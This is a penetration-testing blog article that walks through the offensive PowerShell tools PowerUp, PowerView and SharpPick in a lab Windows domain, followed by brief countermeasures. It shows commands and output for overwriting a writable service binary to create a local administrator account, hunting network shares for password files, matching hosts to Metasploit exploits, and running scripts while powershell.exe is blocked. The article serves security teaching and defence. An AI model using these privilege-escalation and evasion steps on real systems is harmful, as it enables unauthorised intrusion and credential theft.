Offensive PowerShell - Introduction to PowerTools

Offensive PowerShell

Introduction to PowerTools

Michael Schneider
by Michael Schneider
time to read: 13 minutes

PowerShell is a tool with many uses. In earlier Labs articles, I have covered the basics of PowerShell in context of penetration testing and I’ve tried to block PowerShell. Here, I’ll show you how to use PowerShell as an offensive tool. To that effect, I have used PowerTools that is part of the Veil-Framework project.

PowerUp: Local Attacks

PowerUp is a tool that supports local privilege escalation attacks against Microsoft Windows systems. It was developed by Will Schroeder alias @harmj0y. PowerUp consists of a PS1-File and is loaded into a PS-Session using the command Import-Module. The function Invoke-AllChecks checks the system configuration and lists possible attack vectors. Using this function on a Windows 9 client in my test environment, I have found two services that I can manipulate using normal user privileges.

PS C:\Tools\PowerUp> Invoke-AllChecks

[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...

[*] Checking for unquoted service paths...
[*] Use 'Write-UserAddServiceBinary' or 'Write-CMDServiceBinary' to abuse

[+] Unquoted service path: ProcessExplorerService - C:\Program Files\procexp.exe
[+] Unquoted service path: ProcessMonitorService - C:\Program Files\Sysinternals\Process Monitor\Procmon.exe

[*] Checking service executable permissions...
[*] Use 'Write-ServiceEXE -ServiceName SVC' or 'Write-ServiceEXECMD' to abuse

[+] Vulnerable service executable: ProcessExplorerService - C:\Program Files\procexp.exe
[+] Vulnerable service executable: ProcessMonitorService - C:\Program Files\Sysinternals\Process Monitor\Procmon.exe

[*] Checking service permissions...

[*] Checking for unattended install files...

[*] Checking %PATH% for potentially hijackable .dll locations...

[*] Checking for AlwaysInstallElevated registry key...

[*] Checking for Autologon credentials in registry...

[*] Checking for encrypted web.config strings...

[*] Checking for encrypted application pool and virtual directory passwords...

There are two possible attack vectors for each service. The service ProccessExplorerService grants writing rights on file procexp.exe to regular local users. Therefore, any other file can replace this file. There’s a PowerUp function called Write-ServiceEXE that creates a file that in turn adds a local user to the system who has local administrator privileges. This file is used to overwrite the service’s file.

To retain the ability to reverse this process after successful user creation, the original file should be backed up. Write-ServiceEXE automatically creates a backup of the file it replaces.

Before the attack, an attacker should check if the user account he uses has sufficient rights to create a copy of a file in the directory. Should this not be the case, the file needs to be backed up manually in order to remain as undetected as possible and to reverse the process once the file in the directory has been replaced.

The subsequent example creates an error message that says procexp.exe has been overwritten but saving the file failed. Regardless of this, when the service starts up again, the manipulated file is executed and the user scip_admin is created. The result: The attacker has a local administrator account at his disposal.

PS C:\Tools\PowerUp> Write-ServiceEXE -ServiceName ProcessExplorerService -UserName scip_admin
Move-Item : Access to the path is denied.
At C:\Tools\PowerUp\PowerUp.ps1:689 char:13
+             Move-Item $ServicePath $BackupPath
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Program Files\procexp.exe:FileInfo) [Move-Item], UnauthorizedAccessException
    + FullyQualifiedErrorId : MoveFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.MoveItemCommand

[*] Binary for service 'ProcessExplorerService' to create user 'scip_admin : Password123!' written to 'C:\Program Files\procexp.exe'

When they defined the service ProcessMonitorService the path to the executable was defined without using quotation marks. The complete path therefore is C:\Program Files\Sysinternal\Process Monitor\Procmon.exe. When starting the service, Windows will look for executable files after every space. Therefore, it doesn’t look for just Procon.exe but also for the following files, in case they exist:

In order to exploit this misconfiguration, an attacker needs the right to write to these directories. By default, unprivileged users do not have writing rights to directories filed under C:\Program Files. In this example, the permissions of sub-directory Sysinternal allow regular users to write files. Using the PowerUp function Write-UserAddServiceBinary an attacker can create a file that creates a new user. This file is copied to directory Sysinternals and will be named Process.exe. When the service is restarted, a new user named scip_admin2 is created. The result: The attacker has a local administrator account at his disposal.

PowerView: A Walk Through the Domain

PowerView, also developed by Will Schroeder, is a tool that uses Windows domain function in order to gather information about a network and its users. All the tool’s options are sending legitimate requests that can be executed in the context of the rights of a domain user. Some functions, called MetaFunctions, have their origin in a toll named netview by Security Researchers Rob Fuller alias mubix. It doesn’t take much to find information about users, computers and shares.

PS C:\Tools\PowerView> Invoke-Netview
Running Netview with delay of 0
[+] Domain Controller: dc01.labs.scip.ch
[*] Total number of hosts: 2

[+] Server: dc01.labs.scip.ch
[+] IP: 192.168.78.100
[+] dc01.labs.scip.ch - Share: ADMIN$   : Remote Admin
[+] dc01.labs.scip.ch - Share: Backup$  :
[+] dc01.labs.scip.ch - Share: C$       : Default share
[+] dc01.labs.scip.ch - Share: Data     :
[+] dc01.labs.scip.ch - Share: IPC$     : Remote IPC
[+] dc01.labs.scip.ch - Share: NETLOGON         : Logon server share
[+] dc01.labs.scip.ch - Share: SYSVOL   : Logon server share
[+] dc01.labs.scip.ch - Share: Users    :

[+] Server: client02.labs.scip.ch
[+] IP: 192.168.78.135
[+] client02.labs.scip.ch - Logged-on - LABS\\sysop
[+] client02.labs.scip.ch - Logged-on - LABS\\sysop
[+] client02.labs.scip.ch - Logged-on - LABS\\sysop
[+] client02.labs.scip.ch - Logged-on - LABS\\sysop
[+] client02.labs.scip.ch - Logged-on - LABS\\jdoe
[+] client02.labs.scip.ch - Share: ADMIN$       : Remote Admin
[+] client02.labs.scip.ch - Share: C$   : Default share
[+] client02.labs.scip.ch - Share: IPC$         : Remote IPC

The command Invoke-ShareFinder crawls the network and lists shares by system. Even hidden shares appear in the list, suffixed with $. These shares are not displayed in Windows Explorer’s default view. Using Invoke-FileFinder, an attacker can search for files in the listed shares. Calling the function without any additional parameters, it looks for files containing the strings pass, sensitive, secret, admin, login or unattend*.xml in their filename. Additional parameters for searching for patterns as well as strings can be added using -Terms. In the following example, I’ll search for ZIP files.

PS C:\Tools\PowerView> Invoke-FileFinder

FullName       : \\dc01.labs.scip.ch\Backup$\passwords.txt
Owner          : BUILTIN\Administrators
LastAccessTime : 02.07.2015 07:17:40
LastWriteTime  : 02.07.2015 07:18:06
Length         : 44

PS C:\Tools\PowerView> Invoke-FileFinder -Terms *.zip

FullName       : \\dc01.labs.scip.ch\Backup$\backup-01.zip
Owner          : BUILTIN\Administrators
LastAccessTime : 02.07.2015 07:17:13
LastWriteTime  : 02.07.2015 07:17:13
Length         : 0

FullName       : \\dc01.labs.scip.ch\Backup$\backup-02.zip
Owner          : BUILTIN\Administrators
LastAccessTime : 02.07.2015 07:17:25
LastWriteTime  : 02.07.2015 07:17:13
Length         : 0

FullName       : \\dc01.labs.scip.ch\Backup$\backup-03.zip
Owner          : BUILTIN\Administrators
LastAccessTime : 02.07.2015 07:17:32
LastWriteTime  : 02.07.2015 07:17:13
Length         : 0

Every computer object in the Active Directory has the version of the operating system including version and Service Pack added. The function Get-ExploitableSystems reads this information and cross-references it with a list of publicly known exploits.

PS C:\Tools\PowerView> Get-ExploitableSystems

ComputerName    : dc01.labs.scip.ch
OperatingSystem : Windows Server 2008 R2 Standard
ServicePack     :
LastLogon       : 02.07.2015 07:10:13
MsfModule       : exploit/windows/smb/ms10_061_spoolss
CVE             : http://www.cvedetails.com/cve/2010-2729

ComputerName    : dc01.labs.scip.ch
OperatingSystem : Windows Server 2008 R2 Standard
ServicePack     :
LastLogon       : 02.07.2015 07:10:13
MsfModule       : exploit/windows/smb/ms10_061_spoolss
CVE             : http://www.cvedetails.com/cve/2010-2729

ComputerName    : dc01.labs.scip.ch
OperatingSystem : Windows Server 2008 R2 Standard
ServicePack     :
LastLogon       : 02.07.2015 07:10:13
MsfModule       : exploit/windows/smb/ms08_067_netapi
CVE             : http://www.cvedetails.com/cve/2008-4250

ComputerName    : dc01.labs.scip.ch
OperatingSystem : Windows Server 2008 R2 Standard
ServicePack     :
LastLogon       : 02.07.2015 07:10:13
MsfModule       : exploit/windows/smb/ms09_050_smb2_negotiate_func_index
CVE             : http://www.cvedetails.com/cve/2009-3103

PowerPick: Execute PowerShell Scripts Despite Blocks

Project PowerPick by Pentester/Red-Teamer Justin Warner alias @sixdub has one goal: Use PowerShell features without powershell.exe. It’s similar to PS2EXE that I spotlighted in A Story About Blocking PowerShell. While PS2EXE encapsulates a PS script in an executable file, SharpPick is able to execute arbitrary PS scripts originating in files, resources or URLs directly. To achieve this, the script is handed to sharppick.exe as a parameters. Therefore, if powershell.exe is blocked, PS scripts can still be executed.

C:\Program Files\Sysinternals>SharpPick.exe -f C:\Tools\PowerUp\PowerUp.ps1
[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...

[*] Checking for unquoted service paths...
[*] Use 'Write-UserAddServiceBinary' or 'Write-CMDServiceBinary' to abuse

[+] Unquoted service path: ProcessExplorerService - C:\Program Files\procexp.exe
[+] Unquoted service path: ProcessMonitorService - C:\Program Files\Sysinternals\Process Monitor\Procmon.exe

Countermeasures

There’s no universal defence against the attacks named in this article. The defence against attacks like these begins in the configuration of the operating system and the network.

Apart from these measures there is a need for further control mechanisms such as a Whitelist for programs. If it is known which directories are used by running programs, then other directories such as the user profile should be set up so that the execution of files isn’t permitted. Also, make sure that executables aren’t allowed to be stored. Starting with Windows Server 2008, Microsoft has added the feature known as Filter Screening that defines which file types can be stored in shared folders. Using this feature, it’s possible to disable storing of executables.

File Screening in Windows

Using a combination of control mechanisms, the attacks I’ve outlined in this article can be mitigated and the attack surface of a local system as well as the internal network can be significantly reduced.

About the Author

Michael Schneider

Michael Schneider has been in IT since 2000. Since 2010 he is focused on information security. He is an expert at penetration testing, hardening and the detection of vulnerabilities in operating systems. He is well-known for a variety of tools written in PowerShell to find, exploit, and mitigate weaknesses. (ORCID 0000-0003-0772-9761)

Links

Are you interested in a Penetration Test?

Our experts will get in contact with you!

×
Reporting and Documenting

Reporting and Documenting

Michael Schneider

Introduction of CVSS v4.0

Introduction of CVSS v4.0

Michael Schneider

Rogue Device

Rogue Device

Michael Schneider

Windows LAPS

Windows LAPS

Michael Schneider

You want more?

Further articles available here

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here